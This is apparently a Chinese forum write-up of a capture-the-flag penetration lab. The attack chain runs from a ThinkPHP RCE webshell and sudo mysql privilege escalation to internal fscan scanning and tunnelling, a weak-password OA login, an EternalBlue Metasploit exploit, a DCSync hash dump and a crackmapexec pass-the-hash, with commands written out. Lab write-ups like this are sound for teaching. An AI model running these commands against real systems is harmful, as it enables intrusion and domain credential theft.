|
0x01 开启环境 [color=rgba(0, 0, 0, 0.9)]
0x02 web渗透[color=rgba(0, 0, 0, 0.9)]开启环境,访问web页面。 [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]发现登录功能是个鸡肋,翻看别的功能点。 [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]查看到这个熟悉的log,猜测可能存在框架漏洞。 [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]使用漏洞利用工具进行探测。 [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]发现存在thinkphp5.0.23漏洞,成功拿下webshell。 [color=rgba(0, 0, 0, 0.9)]
0x03 内网渗透[color=rgba(0, 0, 0, 0.9)]尝试suid提取,无结果。 find / -perm -u=s -type f 2>/dev/null[color=rgba(0, 0, 0, 0.9)]尝试sudo提取。 [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]发现这个mysql是一个利用点。 https://gtfobins.github.io/[color=rgba(0, 0, 0, 0.9)]查看提权命令 [color=rgba(0, 0, 0, 0.9)] sudo mysql -e '\! find / -name flag*'[color=rgba(0, 0, 0, 0.9)] sudo mysql -e '\! cat /root/flag/flag01.txt'[color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]拿下flag1。
[color=rgba(0, 0, 0, 0.9)]继续信息收集。 ip a[color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]发现有一个内网网段,上传fscan,进行内网扫描。 ./fscan -h 172.22.1.0/24 >> 1.txt打开查看结果
172.22.1.18:135 open172.22.1.21:135 open172.22.1.2:135 open172.22.1.18:80 open172.22.1.15:80 open172.22.1.15:22 open172.22.1.18:3306 open172.22.1.2:88 open172.22.1.21:139 open172.22.1.2:139 open172.22.1.18:445 open172.22.1.21:445 open172.22.1.2:445 open172.22.1.18:139 open[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1) WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393) NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1 NetBios 172.22.1.2 [+] DC C01.xiaorang.lab Windows Server 2016 Datacenter 14393 NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600 WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1已完成 14/14 扫描结束,耗时: 11.656481329s探测出内网其他的资产。[color=rgba(0, 0, 0, 0.9)]现在我们总结一下 172.22.1.2-》DC域控172.22.1.21-》Windows的机器并且存在MS17-010 漏洞172.22.1.18-》信呼OA办公系统[color=rgba(0, 0, 0, 0.9)]现在进行内网穿透。 [color=rgba(0, 0, 0, 0.9)]第一种用 NPS进行代理转发。 https://blog.csdn.net/qq_44159028/article/details/122719330[color=rgba(0, 0, 0, 0.9)]第二种chisel同ew相似但是更稳定 https://blog.csdn.net/weixin_43093631/article/details/118273506[color=rgba(0, 0, 0, 0.9)]也可以用frp等等,都可以用 只要版本对应上就行。 [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]目标内网信呼OA。 [color=rgba(0, 0, 0, 0.9)]弱口令 admin/admin123就成功登录了进去。
[color=rgba(0, 0, 0, 0.9)]查找信呼OA漏洞,发现有一个RCE漏洞,这是第一种打法。 https://blog.csdn.net/solitudi/article/details/118675321
[color=rgba(0, 0, 0, 0.9)]第二种做法是在扫目录基础上,利用/phpmyadmin,可以直接 root/root 登录,然后利用日志写入 webshell [color=rgba(0, 0, 0, 0.9)]这里就不再演示了。 https://blog.csdn.net/m0_48108919/article/details/123053622[color=rgba(0, 0, 0, 0.9)]通过RCE漏洞拿到webshell。(蚁剑连接的时候记得配置上代理) [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]拿下flag2。
[color=rgba(0, 0, 0, 0.9)]接下来打永恒之蓝的漏洞。 [color=rgba(0, 0, 0, 0.9)]使用msf,配置kali自带的proxychains。 https://www.cnblogs.com/junlin623/p/17442091.html[color=rgba(0, 0, 0, 0.9)]proxychains msfconsole走 socks5 流量, proxychains msfconsoleuse exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/bind_tcp_uuidset RHOSTS 172.22.1.21exploit[color=rgba(0, 0, 0, 0.9)]得到正向的 meterpreter shell 后,接下来就是利用 DCSync https://www.cnblogs.com/CoLo/p/16488892.html[color=rgba(0, 0, 0, 0.9)]最大的特点就是可以实现不登录到域控而获取域控上的数据。 在 MSF 下直接load kiwi,然后
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit 导出域内所有用户的 Hash。[color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]之前扫出来172.22.1.2的 445 端口开放,利用 smb 哈希传递,直接用 kali 自带的 crackmapexec, proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "$cmd"[color=rgba(0, 0, 0, 0.9)]最后一部分 flag 在/Users/Administrators/flag下 [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]拿到flag3。
[color=rgba(0, 0, 0, 0.9)]0x04 总结
[color=rgba(0, 0, 0, 0.9)]web打点--》提权--》内网穿透--》内网渗透--》拿下域控。
[color=rgba(0, 0, 0, 0.9)]该靶场对于新学内网的师傅还是挺友好的,除了最后拿下域控那一步,其余的都应该是常见的渗透手法。
| 
发表于 2024-6-22 15:58:43